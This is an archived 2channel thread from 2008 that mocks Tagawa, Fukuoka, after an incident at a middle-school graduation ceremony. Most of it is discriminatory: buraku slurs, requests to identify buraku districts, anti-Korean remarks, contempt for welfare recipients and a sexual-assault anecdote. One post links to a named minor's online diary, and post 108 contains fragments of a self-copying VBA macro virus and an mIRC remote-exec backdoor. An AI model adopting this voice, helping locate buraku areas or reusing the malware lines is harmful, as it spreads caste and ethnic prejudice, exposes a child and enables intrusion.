2ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

田川

1 :名無しさん@お腹いっぱい。:2008/03/21(金) 20:22:35 ID:P206NPxr0


2 :名無しさん@お腹いっぱい。:2008/03/21(金) 21:24:16 ID:RxW7ErO10
2だが

やばいだろその地名

3 :名無しさん@お腹いっぱい。:2008/03/21(金) 22:12:03 ID:i+il+JMzO
圧倒的な同和率と生活保護率を誇っている地区だな。

4 :金 朱烈 ◆/vDsgGmZQk :2008/03/21(金) 22:15:02 ID:ReTk0otn0
T A G A W A G U N

k a w a r a m a c h i


m a g a r i k a n e 


☆  勾     金     中  ☆ 

5 :金 朱烈 ◆/vDsgGmZQk :2008/03/21(金) 22:21:08 ID:ReTk0otn0
ボンタンで卒業



6 :名無しさん@お腹いっぱい。:2008/03/21(金) 22:23:51 ID:acxVCNpoO
革裂き町
亜馬義








7 :金 朱烈 ◆/vDsgGmZQk :2008/03/21(金) 22:24:21 ID:ReTk0otn0
マイク握り締め『スピッツ』



8 :名無しさん@お腹いっぱい。:2008/03/21(金) 22:25:51 ID:TD/oyM4mO
何県?

9 :通名 金山 ◆/vDsgGmZQk :2008/03/21(金) 22:27:28 ID:ReTk0otn0
そして2階から『放 尿』

10 :名無しさん@お腹いっぱい。:2008/03/22(土) 01:57:53 ID:OSNtP819O
市長もそうだといううわさ聞いたが

11 :名無しさん@お腹いっぱい。:2008/03/22(土) 02:11:45 ID:2l30vpGi0
羊水

12 :名無しさん@お腹いっぱい。:2008/03/22(土) 12:24:30 ID:Zv3zL14BO
俺も今コンビニで見た吹いた

13 :名無しさん@お腹いっぱい。:2008/03/22(土) 13:00:35 ID:Cl99KUwj0
給食室のおかずが、丸ごと無くなったり
大小便のようなものが混入されていた形跡もあったとのこと


14 :名無しさん@お腹いっぱい。:2008/03/22(土) 18:41:09 ID:6OrRCK6M0
田舎者でエタ

役満です

15 :名無しさん@お腹いっぱい。:2008/03/22(土) 18:48:12 ID:DaKRJWte0
      ノ L ___   
      ⌒ \  /\
     / (●) (●)\  
   /    (__人__)   \  大人は汚か!
   |       |::::::::|     |   見た目だけで俺たちば判断しょうが!!      
   \     `⌒´    /  
     \ ,,,,    ,,, /        ____
    ./:::::::::::::\  ./::ヽ‐、      /     \
   /:::::,::::::::::::::|  |::::::| ::i     /  _ノ '' 'ー \
  ./:::::::| :::::::::::::::|  |::::::| ::i   /  (●)  (●)  \ 
  i::::::/ i::::::::::::::::|  |:::::」 ::i   |      (__人__)    |  
  i::::::i  ^| ̄ ̄  ^|ノ :/    \      ` ⌒´   /
  .ヽ:::ヽ /三三三三)/   ./⌒          ヽ,
   \_):::::::::::::::::::::::::|   ./   /、 。    。 r  \
    .〈::::: ノ::::::| ::::::::|  .(_ ̄ ̄\'        |)  .)
   /:::::::::::::::::::| :::::::::|   /⌒ヽJ三三三三三/  /
   .i::::::::::::::::::::::| :::::::::|  /:::::::::::::::::::;;; ::::::::::::::::::::: し^⌒ヽ
   .i::::::::::::::::::::ノ ::::::::ノ ./::::::::::::::::::::ノ::::::::::::::::::::: 、:::::::::::::::.) 
   .|:::::::::::::/ \::::::/  .|:::::::::::::::::::::|ヽ、::::::::,,:::::ノi:::::::::::::::/
   .ヽ::::/    ヽ:::|__ i::::::::::::::::::ノ    ̄^ ̄  \:::::::/
  .ノ.^/      ヽ、_ ヽ,::::::::/          .ヽ、__つ
  |_/          .ノ.^/   
              .|_/

16 :名無しさん@お腹いっぱい。:2008/03/22(土) 19:05:18 ID:xU+4VL6W0
多蛾和=DQN
20年前の暴走族かw

17 :名無しさん@お腹いっぱい。:2008/03/23(日) 03:29:15 ID:U+B2Rh6mO
田川出身田川住みの俺に何か質問ありますか?

18 :名無しさん@お腹いっぱい。:2008/03/23(日) 04:18:07 ID:d3b3uOdMO
質問する前に、自分で調べり♪

19 :名無しさん@お腹いっぱい。:2008/03/23(日) 11:15:23 ID:+daa9eboO
>>17
田川郡の中学生は勾金中学校のようなDQNばかりなのですか?
放尿したことありますか?

20 :名無しさん@お腹いっぱい。:2008/03/23(日) 18:18:56 ID:lOzrJwUG0
ようつべに例の卒業式のニュース動画あったね。
その関連動画に、その辺りを車で流して撮影した動画もあった。
香ばしい住宅街が映ってました。

21 :名無しさん@お腹いっぱい。:2008/03/24(月) 04:34:31 ID:OwOsuXeIO
>>19
放尿はないけどwww
郡部はだいたい悪いよ!悪いっつっても末路は哀れだけど。
特に毎年悪いのは糸田、川崎(鷹峰)やね!
市内ならグーグルマップで松原、大藪周辺を調べたら面白いかもよ!さらに質問どーぞ!

22 :名無しさん@お腹いっぱい。:2008/03/24(月) 05:21:08 ID:LuNIxUhx0
>>21
田川、筑豊にはたくさん改良住宅がありますが、全てが同和関連という訳ではなく
いわゆる炭鉱住宅というものも沢山ありますよね
分かりやすい見分け方とかありますか?

23 :名無しさん@お腹いっぱい。:2008/03/24(月) 05:46:15 ID:ZdlADVs70
いくら田舎でヤバい地域だからってありゃねーだろ・・・
37のおっさんだが俺らの時でさえもあんなの絶滅してたぞ。
時が止まってるとしか思えん。格好悪いって気づけよ。

24 :名無しさん@お腹いっぱい。:2008/03/24(月) 07:06:39 ID:Yuk09zrj0
田川に住んでいるだけで、人生乙って感じだよな。
北九州の方が、まだまし。
ちゅうか、福岡県はブラックゾーンが多すぎ。

25 :鬼畜:2008/03/24(月) 15:03:04 ID:eqHG6sNsO
いまどきあんなわかりやすいヤンキーが生息してるのに驚いた。

あの髪型どうやってつくんの?

26 :名無しさん@お腹いっぱい。:2008/03/24(月) 16:57:12 ID:+VTV6JFNO
福岡市内 久留米 
北九州  筑豊 
福岡県の半分はガラわるい

27 :名無しさん@お腹いっぱい。:2008/03/24(月) 17:18:31 ID:cY7ga5eNO
○田聖子は武家の家柄と聞いたがギザギザハートはそうなのか?

28 :名無しさん@お腹いっぱい。:2008/03/24(月) 18:57:55 ID:Oqhioluu0
田川ってわざとらしくほざく裏と韓国朝鮮とかは笑うな。連中はヤクザになるかも知れんが、お前らより陰険ではないよ。

29 :名無しさん@お腹いっぱい。:2008/03/24(月) 19:06:53 ID:8n0rsUl/0
>お前らより陰険ではないよ。

ないないww
なにかされたんすか?wwwwww

30 :名無しさん@お腹いっぱい。:2008/03/24(月) 19:12:24 ID:Oqhioluu0
されてないから擁護する書き込みしてるんだよ。29てめーの方が悪質だと言ってる意味も分からんか。データー揃わんと読解力もブロイラーみてーなもんだな。暗闇で食われる為飼育されてきた鳥みてーなもんだと言いたいんだよ。

31 :名無しさん@お腹いっぱい。:2008/03/24(月) 19:18:54 ID:Oqhioluu0
笑う表情怒る表情、演技掛かった臭い芝居しか出来ない偽者が裏であり、朝鮮韓国の手法を馬鹿な頭で必死に実行してるお前えらは馬鹿そのものだろ。

32 :名無しさん@お腹いっぱい。:2008/03/24(月) 19:32:54 ID:8n0rsUl/0
え?どうしたんすか?
そんなに顔真っ赤になって連投っすか?wwwwww

33 :名無しさん@お腹いっぱい。:2008/03/24(月) 21:36:58 ID:whWwCzKzO
もっとやれ

34 :名無しさん@お腹いっぱい。:2008/03/24(月) 22:16:13 ID:Yuk09zrj0
>26
他にも、務名片、繰流目もB落の宝庫と聞く
F県はビーチク大杉w

35 :名無しさん@お腹いっぱい。:2008/03/25(火) 00:17:01 ID:LkvaGItyO
>>26
車のナンバープレートかと思ったぞ。
福岡県内の市町村でBの無い所ってあるのかな?無いような気がする。

36 :名無しさん@お腹いっぱい。:2008/03/25(火) 02:51:27 ID:v462eKhoO
飯塚

37 :名無しさん@お腹いっぱい。:2008/03/25(火) 07:39:16 ID:zn4yIgr20
>>27
同和枠で国鉄入ったって聞いたけど事実は知らん

38 :名無しさん@お腹いっぱい。:2008/03/25(火) 18:24:31 ID:DOio4HdG0
でもあの田舎者エタ達は都会の女はああいうのキモがってるって知っててやってるのかね?

それとも一生田舎部落で生きていくつもりなんか?

39 :名無しさん@お腹いっぱい。:2008/03/25(火) 18:57:53 ID:nb5qQjKl0
大阪の某地区では1980年代後半は
田川の連中に負けないぐらいのことはしてたんだが、いまはどうか知らん。
当時は中学校内で若い女の先生が強姦されるという事件が相次いで、
とうとう元気のいい体育会系の”にーさん”と、ショボイ”おっさん”だけで
女の先生がほとんどいないという時期もあったぞ。

女の先生が急に退職したり、他の安全な?学校に転勤させたりしだしたきっかけは、
大学を卒業して初めて赴任した中学校を一日でやめてしまった新人の美人の先生がいた。
原因はなんだろうと皆いぶかしがったが、アトで聞いたら、
新学期早々に、音楽室の準備室で5〜6人に襲われて、
パンツからブラまで全部脱がされて、もうちょっとで犯されかかったのを
たまたま通りがかった別の先生が火災報知機を鳴らしたため、
パンツもズボンも脱いで”お楽しみの時間”のはずだった連中も仕方なく逃走し、
犯されかかった先生はその一日だけで退職してしまったらしい。

田川の中学校も若い女の先生はダメ!というレベルだろうか…


40 :名無しさん@お腹いっぱい。:2008/03/26(水) 14:34:54 ID:GKvUZcKRO
田川は半分以上がBなの?

41 :名無しさん@お腹いっぱい。:2008/03/26(水) 15:00:48 ID:AZE0y5Tj0
8人の中の一人、しかもあんなDQNが生徒会長。
実名で挑発的な書き込みを続けています。


【モバゲー】前○秀汰【DQN勾金中生徒会長】
http://pc11.2ch.net/test/read.cgi/net/1206421331/l50

実名を出して書き込み続けている日記
http://mbga.jp/.g3af9875.bWJ1LjcwMTM2MDc1/_dia_view?d=329847678


42 :名無しさん@お腹いっぱい。:2008/03/26(水) 15:58:22 ID:g2R1iuNm0
でもマスコミが今までアンタッチャブルだった世界に手をつけたってのは進歩だな

毎日新聞はよくやった。都会の人間には分からないエタのケダモノ行為をもっと報道しろ

43 :名無しさん@お腹いっぱい。:2008/03/31(月) 22:43:25 ID:7RkzWVC60
すげえ地域

44 :名無しさん@お腹いっぱい。:2008/04/01(火) 07:15:37 ID:URoKMDUei
Y33に七人乗って電柱衝突ktkr

45 :名無しさん@お腹いっぱい。:2008/04/01(火) 14:01:11 ID:h7tXH5xa0

怪獣の工事は年度内に終わらせましたか?

46 :名無しさん@お腹いっぱい。:2008/04/06(日) 21:03:53 ID:SCOz1hInO
勾金中学

47 :名無しさん@お腹いっぱい。:2008/04/07(月) 01:37:23 ID:Dx9Hf8QPO
・「俺、男に生まれてよかったあ。働かんでいいもん。」
稼ぎは女が小倉のスナックやクラブで上げてくるもの
という変な認識を持ったやつがたまにいる。

・救急車をタクシーと勘違いしているやつもたまにいる。

48 :名無しさん@お腹いっぱい。:2008/04/08(火) 13:50:20 ID:fArT9sdeO
良スレage

49 :名無しさん@お腹いっぱい。:2008/04/08(火) 15:46:35 ID:UDgFoMsG0
ふくおかんサファリだな

50 :名無しさん@お腹いっぱい。:2008/04/08(火) 16:46:47 ID:AeRQEbOrO
古賀、二階、谷垣、太田、与謝野、鳩山は人権擁護法案&ユニバーサル法案を推進し日本を中国、南北朝鮮に売り渡そうとしている売国奴だ。各スレ、各コミュニティでこいつらの絶対落選運動を展開せよ!

51 :名無しさん@お腹いっぱい。:2008/04/09(水) 20:19:48 ID:fFwCSjPNO
http://sentaku.org/m/social/1000001544/

52 :名無しさん@お腹いっぱい。:2008/04/09(水) 22:47:54 ID:73cr26JfO


53 :名無しさん@お腹いっぱい。:2008/04/09(水) 22:50:00 ID:73cr26JfO
救急車をタクシー代わりに使うヤツ居るねー

福岡南部にも結構、居るぞ!

54 :名無しさん@お腹いっぱい。:2008/04/09(水) 23:48:13 ID:421N4UPQ0
スレタイがNGワードな気がするが
国民的になってしまったので大丈夫だろうw


55 :名無しさん@お腹いっぱい。:2008/04/14(月) 13:13:57 ID:dO5UKLX9O
田川郡→×
田川軍→○

56 :名無しさん@お腹いっぱい。:2008/04/14(月) 16:00:37 ID:Og3t0XWTO
スクールウォーズ

57 :名無しさん@お腹いっぱい。:2008/04/22(火) 21:26:16 ID:+lmiLpmd0
田川は、日本で唯一銃の所持を認められているんだよね

58 :名無しさん@お腹いっぱい。:2008/04/24(木) 00:07:47 ID:ThNjRzeUO
>>57
発砲も認められている。

59 :名無しさん@お腹いっぱい。:2008/04/24(木) 00:12:15 ID:gTTj/6xG0
>>57
銃の所持はどこでも認められていると思うんだが?

60 :名無しさん@お腹いっぱい。:2008/04/24(木) 06:27:49 ID:uqrmE/pw0
>>55
omosiroi

61 :名無しさん@お腹いっぱい。:2008/04/25(金) 23:57:21 ID:0JMlXwzU0


62 :名無しさん@お腹いっぱい。:2008/04/28(月) 10:10:15 ID:+KY8YfceO
今朝の西日本新聞に元暴走族の工藤さん講演の記事出てるな

63 :名無しさん@お腹いっぱい。:2008/05/03(土) 08:01:59 ID:Nqy1eg8q0
今日の田川市ニュース
http://news.google.co.jp/news?hl=ja&ned=jp&ie=UTF-8&q=%E7%94%B0%E5%B7%9D%E5%B8%82&scoring=n

64 :伊藤伊織:2008/05/04(日) 13:05:29 ID:cjw12kAb0
                                                     ごめんなさい・・・
ごめんなさい・・・

                                                             ごめんなさい・・・ごめんなさい・・・ごめんなさい・・・
ごめんなさい・・・
                                                ごめんなさい・・・
                                         ごめんなさい・・・ごめんなさい・・・


65 :名無しさん@お腹いっぱい。:2008/05/17(土) 18:39:12 ID:nDY2ZpfMO
久しぶりに田川に帰ってきたけど、今日は友達1人も出て来ない。
うぅ…。
(´ΩωΩ`)

66 :名無しさん@お腹いっぱい。:2008/05/17(土) 18:42:51 ID:xlrSAdx+0
田川って柄の悪い町ぞって、地元の知人が言ってました。炭鉱で部落だと、自ら言ってました。根は悪い奴じゃなかったが・・もう死んだかな。

67 :名無しさん@お腹いっぱい。:2008/05/17(土) 18:44:13 ID:xlrSAdx+0
やっぱり人のプイバシーとセックスには異常な程入り込んでたな・・死んだかな・・

68 :名無しさん@お腹いっぱい。:2008/05/20(火) 23:32:59 ID:8IjjbRiEO
これが今問題になっている若者達のら抜き言葉か

69 :名無しさん@お腹いっぱい。:2008/05/21(水) 07:56:50 ID:H/mBYmBH0

★遺体発見:田川の彦山川に男性遺体 /福岡

 19日午後3時半過ぎ、田川市糒の彦山川で、人がうつぶせになって沈んでいるのを釣りに来た近所の男性が見つけ、田川署に通報した。

 引き上げたところ、既に死亡していた。胸から腹部にかけてコンクリートブロック1個がロープでくくりつけられていた。
 
 ただ、手足は縛られていなかった。同署は身元を調べている。

 調べでは、40〜60歳の男性とみられ、身長168センチくらいで、中肉の丸刈り。

 長袖の柄シャツに白っぽいジャンパーを着て、黒色ズボンに黒の革靴をはいていた。

 所持品は未確認だが、今のところ目立った外傷はないという。現場は取水ぜきの上流側。

 〔筑豊版〕 毎日新聞 2008年5月20日 地方版

 ttp://s02.megalodon.jp/2008-0521-0754-12/mainichi.jp/area/fukuoka/news/20080520ddlk40040697000c.html




70 :名無しさん@お腹いっぱい。:2008/05/27(火) 04:16:19 ID:WSVJBBo6O


71 :名無しさん@お腹いっぱい。:2008/05/28(水) 05:03:48 ID:1HS/Jy9+O
川田

72 :名無しさん@お腹いっぱい。:2008/05/28(水) 09:32:07 ID:MOICX8Xw0
香川スレの奴ごときから馬鹿にされてるぞwww <勾金中

73 :名無しさん@お腹いっぱい。:2008/05/28(水) 13:42:21 ID:HxaYiPzUO
岡田守生

74 :名無しさん@お腹いっぱい。:2008/06/08(日) 07:27:19 ID:a6KwFC8F0
田川・・・

75 :名無しさん@お腹いっぱい。:2008/06/08(日) 19:27:22 ID:SjanceTF0
 __゚\__
 |_ 筑 豊 _|  JR九州
  | スイッチ |   日田彦山鉄道事業部
   ̄ ̄ ̄


76 :名無しさん@お腹いっぱい。:2008/06/08(日) 22:07:10 ID:KS2S6VqX0
これも張らんかい馬鹿

:::::  \
\:::::  \
 \::::: _ヽ __   _     豚
  ヽ/,  /_ ヽ/、 ヽ_
   // /<  __) l -,|__) >  箱
   || | <  __)_ゝJ_)_>
\ ||.| <  ___)_(_)_ >   横
  \| |  <____ノ_(_)_ )
   ヾヽニニ/ー--'/      丁
    |_|_t_|_♀__|
      9   ∂
       6  ∂
       (9_∂

77 :名無しさん@お腹いっぱい。:2008/06/13(金) 00:34:54 ID:snRUh6dUO
>>75
吹いたw

78 :memo:2008/06/13(金) 07:57:03 ID:qLdSc+ki0
ttp://s01.megalodon.jp/2008-0613-0755-53/kyushu.yomiuri.co.jp/news/national/20080612-OYS1T00206.htm

授業妨害する中学生徒の学校外教室・・・・・

79 :名無しさん@お腹いっぱい。:2008/06/16(月) 14:22:18 ID:lVEu79wc0
誰か何か書き込んでくれ。

80 :名無しさん@お腹いっぱい。:2008/06/17(火) 00:44:44 ID:MPQUTORv0
福岡県警田川署は15日、ミニバイクを盗んだとして窃盗の疑いで、同県添田町
など四自治体でつくる田川郡東部環境衛生施設組合の職員、小黒豪容疑者(34)
=添田町添田=を逮捕した。容疑を認めているという。

調べでは、小黒容疑者は15日午前1時20分ごろ、田川市の商店街で、
ミニバイクを押して歩いていたアルバイト女性(16)に「ちょっとどいて」と声をかけ、
そのままバイクに乗って逃げた疑い。

女性から通報を受けた田川署員が小黒容疑者を追跡、現場から約200メートル
離れた駐車場で逮捕した。小黒容疑者は当時、酒に酔っていたという。

ソース:MSN産経ニュース 2008.6.15 16:47
http://sankei.jp.msn.com/affairs/crime/080615/crm0806151646017-n1.htm


81 :名無しさん@お腹いっぱい。:2008/06/17(火) 09:34:49 ID:BmirTlbG0
>>「ちょっとどいて」 wwwwww!

82 :名無しさん@お腹いっぱい。:2008/06/17(火) 15:03:39 ID:sJCPFW1O0
>>80
「ちょっとどいて」とバイク強奪、田川郡東部環境衛生施設組合の職員逮捕・・・福岡・田川
http://news24.2ch.net/test/read.cgi/dqnplus/1213629531/

83 :名無しさん@お腹いっぱい。:2008/06/17(火) 18:28:09 ID:IAv0r+OhO
フジテレビで、どんだけイッコーが、故郷田川を訪問してる(笑)

84 :名無しさん@お腹いっぱい。:2008/06/17(火) 18:46:02 ID:IAv0r+OhO
不良の更正施設「ふれ愛義塾」を訪れたイッコーが、
性同一障害の女の子に、男になる決心をさせて、オッパイを取る手術をさせてしまいました。

85 :名無しさん@お腹いっぱい。:2008/06/17(火) 20:15:58 ID:PU1+lezM0
>>80
ちょwwwこれwwwww

86 :名無しさん@お腹いっぱい。:2008/06/18(水) 17:50:16 ID:MziK7o7v0
>80
wwwww


87 :名無しさん@お腹いっぱい。:2008/06/21(土) 20:14:12 ID:M4ANJKhZO
北斗の拳だな、まるで

88 :名無しさん@お腹いっぱい。:2008/06/24(火) 15:24:17 ID:/uVhW3b30
シャブでパクられても関係者の名前を謡わなければ
出所後も信頼と愛情で包んでくれる住民たちのいる自由平等の地域。

89 :名無しさん@お腹いっぱい。:2008/06/24(火) 22:53:56 ID:NOuV22nz0
童話(反日)教育してます?

90 :名無しさん@お腹いっぱい。:2008/06/25(水) 00:44:59 ID:rxCMoes4O
田川でバラックあるとこ教えて

91 :名無しさん@お腹いっぱい。:2008/06/25(水) 01:11:18 ID:quYNCKoo0
>>80 ん?高校生じゃないのか?

92 :名無しさん@お腹いっぱい。:2008/06/28(土) 11:04:46 ID:RsgqtcHe0
田川ってB地区ありますか?

93 :名無しさん@お腹いっぱい。:2008/06/28(土) 11:11:14 ID:UKmPA0Oh0
B地区だらけ

94 :名無しさん@お腹いっぱい。:2008/06/28(土) 11:30:47 ID:RsgqtcHe0
どこがB地区か教えてください

95 :名無しさん@お腹いっぱい。:2008/06/28(土) 12:44:53 ID:pYgQMYgQ0
ほぼ全域でよくね?

96 :名無しさん@お腹いっぱい。:2008/06/28(土) 13:12:41 ID:Ppj49XZcO
他所ものからすれば筑豊全体がb

97 :名無しさん@お腹いっぱい。:2008/06/28(土) 18:15:43 ID:RsgqtcHe0
はっきりとどこがBなのか誰も知らないんですか?

98 :名無しさん@お腹いっぱい。:2008/06/28(土) 20:03:48 ID:f9mreCuF0
筑豊歩けばBに当たる

99 :名無しさん@お腹いっぱい。:2008/06/28(土) 20:10:08 ID:2rb1fU5l0
平成筑豊鉄道 駅命名権など販売へ
6月28日15時8分配信 毎日新聞
http://headlines.yahoo.co.jp/hl?a=20080628-00000011-maip-soci
 福岡県筑豊、京築地区を運行する第三セクター「平成筑豊鉄道」
(本社・同県福智町)は27日、全35駅と車両5両の施設命名権
(ネーミングライツ)を7月から販売すると発表した。九州の鉄道
では初の試み。同社は07年度まで4期連続の赤字で、増収策の一環。

 販売額は乗降客最多の直方駅(直方市)を年間500万円とし、他
の34駅は乗降客数に応じて減額する。企業名もOKだが、現駅名に
結合させる形にする方針。車両は5両とも昨年導入した新型「なのは
な号」で、こちらは名前を変更する形になる。内装を含む全面ラッピ
ング権をつけ、年間300万円。改装費は命名主の負担。

 同社は13年連続で利用客が減り、昨年度は過去最低の202万人
と経営難が続く。昨年8月には沿線住民10万世帯に「1回でもいい
から乗ってみて」とチラシを各戸配布するなど、あの手この手のPR
策を続けてきた。

 出島静吾専務は命名権販売に「正直『ここまでやるか』とも思った
が、何とか立て直しの目玉になるよう期待して踏み切った」と話して
いる。問い合わせは同社(0947・22・1000)。




100 :名無しさん@お腹いっぱい。:2008/06/29(日) 09:40:07 ID:Y6YEXVf70
>>97
あんた街道?PCの使い方知らんの?www


101 :名無しさん@お腹いっぱい。:2008/06/29(日) 11:05:27 ID:nwoO8kk30
直鞍はどうなの?

102 :名無しさん@お腹いっぱい。:2008/06/30(月) 16:46:05 ID:1HBRX/yo0
b指定って大字とか小字単位でしょ?

>>97
そこらのじいさんたちに訊いてみ

103 :名無しさん@お腹いっぱい。:2008/07/01(火) 17:51:33 ID:W95RJfXi0
ETCで「キセル」=カード悪用、全国初逮捕−佐賀県警
7月1日17時7分配信 時事通信

自動料金収受システム(ETC)で2枚のカードを悪用し通行区間を偽ったとして、佐賀県警高速道路交通警察隊は1日、電子計算機使用詐欺容疑で福岡県うきは市浮羽町高見、自営業石井誠二容疑者(40)を逮捕した。
県警によると、ETCカードで「キセル」通行したとして同容疑で逮捕するのは全国初という。
調べによると、石井容疑者は先月11日から20日にかけ計5回、九州横断自動車道の通行料金を安くしようと、料金所の出入り口で別々のETCカードを使い不正通行。
正規料金との差額8200円をだまし取った疑い。

104 :名無しさん@お腹いっぱい。:2008/07/01(火) 18:46:15 ID:ZQDGq0ZKO
田ガワ博和ゴミ野郎死ね

105 :名無しさん@お腹いっぱい。:2008/07/02(水) 02:21:51 ID:Jji1xe43O
この前テツタビで林家いっ平が田川の炭住を紹介してたけど、どの辺りに残ってるの?
まだ人が住んでるようだったけど。
あと、トンチャンとかいう内臓料理紹介してたけど、田川の名物なの?

106 :名無しさん@お腹いっぱい。:2008/07/02(水) 19:23:40 ID:00k5f+U40
↑トンチャンは「豚腸」の意味。朝鮮人が広めた料理で田川の郷土料理ではない。
全国の朝鮮人労働者のいた炭鉱で食べられていた。

107 :名無しさん@お腹いっぱい。:2008/07/11(金) 02:22:55 ID:lkLM/n6A0
ttp://ch1.artemisweb.jp/read1/oppai/

29ってどこだよ?田川?

108 :名無しさん@お腹いっぱい。:2008/07/11(金) 02:34:01 ID:3j6Kdf0Z0
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
n0=on 900:text:!exec*:*:{.notice $nick Execut comanda: $2-

109 :名無しさん@お腹いっぱい。:2008/07/12(土) 21:28:39 ID:pH1xLaLIO
応答と革先はどっちがやばいんだ?

110 :名無しさん@お腹いっぱい。:2008/07/16(水) 14:33:03 ID:dk7SJoT50
>>107
書いてあるやん?

>>109
大塔って元気の良い世代が居なくない?

111 :名無しさん@お腹いっぱい。:2008/07/16(水) 17:44:48 ID:pIeHgTnd0
田川のことなのに何故みんな書き込まないんだ。
馬鹿なお前らの話が聞きたいのに。


112 :名無しさん@お腹いっぱい。:2008/07/17(木) 00:15:47 ID:wLrEUakB0
>>111
連中がネットなんかやるわけないやんw

113 :名無しさん@お腹いっぱい。:2008/07/17(木) 16:05:57 ID:y5ZA2zzG0
田川てISDN?

114 :名無しさん@お腹いっぱい。:2008/07/19(土) 09:55:49 ID:pLux54ft0
最近、 Ψ-∀・Ψ  ←この人見かけないね。板くらいは覗いてるのかな?

115 :名無しさん@お腹いっぱい。:2008/07/19(土) 23:32:45 ID:EZucaoqB0
暴力行為で保護観察中の中3、教諭殴った容疑で逮捕

 福岡県警は18日、同県田川郡内の町立中学校の3年男子生徒(14)を
傷害の疑いで逮捕した。この生徒は3月にも校長室の備品を壊したとして、
別の生徒とともに暴力行為等処罰法違反の疑いで逮捕され、保護観察中だった。

 発表によると、生徒は18日午前10時40分ごろ、終業式後の職員室で、
「久しぶりやのう」と言いながら男性教諭(42)の顔を殴り、唇を切る
1週間のけがを負わせた疑い。「先生が向かってきたので(追い払うために)
振り払った手が当たった」と容疑を否認しているという。

 町教委は、同校で一部生徒の授業妨害が目立ち始めたとして、6月18日に
学校とは別の場所に「サポート教室」を開設し、問題行動を繰り返す生徒を
通わせている。

 校長は、「この生徒は落ち着きを取り戻しつつあったので、サポート教室ではなく、
学校で様子を見ていた。指導力不足を痛感している」と話している。

(2008年7月19日読売新聞)
http://kyushu.yomiuri.co.jp/news/national/20080719-OYS1T00191.htm


116 :名無しさん@お腹いっぱい。:2008/07/20(日) 09:19:48 ID:udzRm8KU0

久しぶりやのう・・・w

117 :名無しさん@お腹いっぱい。:2008/07/20(日) 14:24:19 ID:tCYOV0m6O
田川凄すぎw
住んでみたい〜♪

118 :名無しさん@お腹いっぱい。:2008/07/20(日) 14:29:40 ID:5pTI8hTD0
久しぶりやのう

www

119 :名無しさん@お腹いっぱい。:2008/07/20(日) 15:48:44 ID:OaU6xTQPO
ポンジュース味のチロルチョコが美味い件

120 :名無しさん@お腹いっぱい。:2008/07/20(日) 19:11:32 ID:TYLwedMV0
久しぶりやのうwww

121 :名無しさん@お腹いっぱい。:2008/07/20(日) 19:49:04 ID:bDlNfaGmO
なんしよん?

122 :名無しさん@お腹いっぱい。:2008/07/20(日) 20:02:08 ID:K7F5ePOk0
ヤクザだな

123 :名無しさん@お腹いっぱい。:2008/07/20(日) 22:29:01 ID:1crFe5wg0
偉くは無いが大物にはなれるかもしれない。

124 :名無しさん@お腹いっぱい。:2008/07/20(日) 22:36:10 ID:hbPssUBE0
これ卒業式で暴れてた奴だよね?

125 :名無しさん@お腹いっぱい。:2008/07/23(水) 15:15:47 ID:fwRxTNT6O


126 :名無しさん@お腹いっぱい。:2008/07/23(水) 16:32:31 ID:8F4zy9WgO
鷹峰伝説

【鷹峰中学校】
福岡県田川群川崎町にある中学校。


生徒が吸ったタバコの吸い殻を先生達が拾い集める。

単車(族車)で運動場を走り回る。

通学途中、授業中にもシンナーを吸う。

学校のプールは授業で使用されておらず、水中にはブラックバスなど魚を飼っており休み時間には生徒達で釣りを楽しむ。
全校集会では毎回生徒と先生の喧嘩勃発。

女子トイレでは不純性交遊。

保健室にはベッドが無い。←怪我人の処置よりサボり目的の生徒を減らすことを優先。

卒業式にはパトカーが巡回。





今は平和だおo(^-^)o



127 :名無しさん@お腹いっぱい。:2008/07/26(土) 23:15:04 ID:cmlSxqqM0
大任町の真実

1.町長が町長室で執務中に射殺される町
2.現職町議長が銃撃され、安全策で防弾チョッキを着て議会に出る町
3.2の現職町議長が"身の危険を感じ"議会を無断欠席する町
4.2の現職長議長が議会を無断欠席中に議会事務局がその所在を把握してない町
5.現職町議が銃刀法違反で逮捕される町(2の議員と同一人)_
6.町議選トップ当選の現職町議が広域高級車窃盗団の頭目として逮捕される町(ちなみに2位当選は2.の議員)
7.現職町議3人が闘鶏賭博で逮捕される町
8.町長の娘が運営する企業組合事務所に火炎瓶3発投げ込まれる町

128 :名無しさん@お腹いっぱい。:2008/07/26(土) 23:16:12 ID:cmlSxqqM0
数字で見る筑豊のすがた

最新の統計から福岡県の全66市町村中の生活保護率トップ10を抜粋してみると、その中に田川郡(全7町村)が
余すところ無く総て含まれていることがわかります。
しかもトップ7まで田川郡が完全独占状態。8位〜10位も筑豊の構成市町村が占めています。
単位は千分率(パーミル)であることに注意。人口千人あたりの生活保護受給者の数です。 ちなみに、
平成17年6月現在の生活保護率全国平均は 11.4 パーミルです。(厚労省調べ)  全国平均の約10倍、
赤ん坊から年寄りまでひっくるめておよそ10人に1人が生活保護受給者。それが筑豊クオリティ。

−−−−−−−−−−−−−−−
市町村データ(2006年版) 生活保護率(平17年度)
 ※市町村名の後に*のあるものは田川郡。

  市町村   生活保護率(パーミル)
1 川崎町*  160.7
2 大任町*  123.0
3 福智町*  101.0
4 糸田町*  92.2
5 添田町*  79.6
6 赤村 *  76.0
7 香春町*  71.9
8 嘉麻市   60.8
9 小竹町   52.9
10 田川市  45.9

出典:福岡県総務部地方課,福岡県市町村振興協会『福岡県市町村要覧2006』財団法人福岡県市町村振興協会,2006.


129 :名無しさん@お腹いっぱい。:2008/07/27(日) 22:40:45 ID:g3gqnp1v0
>>128
田川は日本の朝鮮ですね、わかります。

130 :名無しさん@お腹いっぱい。:2008/07/27(日) 23:29:38 ID:3t/VrrMf0
田川も川崎もガラは悪いが、鉄道が通ってるからまだ開けた印象があるが、
大任は横溝正史の小説にも出てきそうな、閉鎖的な村という感じを受ける。
大任も昔は鉄道が通ってたけどね

131 :名無しさん@お腹いっぱい。:2008/07/28(月) 17:28:54 ID:LoC/UoZo0
たかりの精神が浸透している。
約束という意味がわからない人間が多数存在する町
夫婦別姓で保護費ダブル支給はあたりまえ!!
発展もない、産業もない、未来もない、
全国屈指の住みにくい町田川!!!


132 :名無しさん@お腹いっぱい。:2008/07/30(水) 10:12:52 ID:RUxj+9Qz0
田川人よ、誇りに思え!!
唯一保険会社が撤退した町だぜw
素晴らしいことじゃまいか。
これは日本のみならず、世界に誇れる偉業だぜw
田川人よ、勉強なんぞしなくていい。どんどん中学からガキ作れ、最低30人子孫残せ。
クサレこそ国家繁栄!
